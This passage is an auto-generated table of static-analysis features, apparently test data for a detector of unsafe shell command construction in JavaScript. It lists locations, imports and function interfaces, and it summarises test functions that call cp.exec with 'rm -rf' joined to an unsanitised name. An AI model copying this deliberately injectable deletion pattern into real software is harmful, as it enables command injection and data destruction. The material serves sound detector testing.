name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:21 | module. ... .arrays | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:21 | module. ... .arrays | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:94:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:94:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:94:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:8:82:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:8:82:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:8:82:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:16:82:21 | arrays | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:16:82:21 | arrays | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:16:82:21 | arrays | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | this | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | this | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:82:24 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | 'arguments' object of anonymous function | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | exceptional return of anonymous function | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | functio ... // OK\\n} | assignedToPropName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | return of anonymous function | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:25:94:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:35:82:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:3 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:3 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:8 | cp.exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody 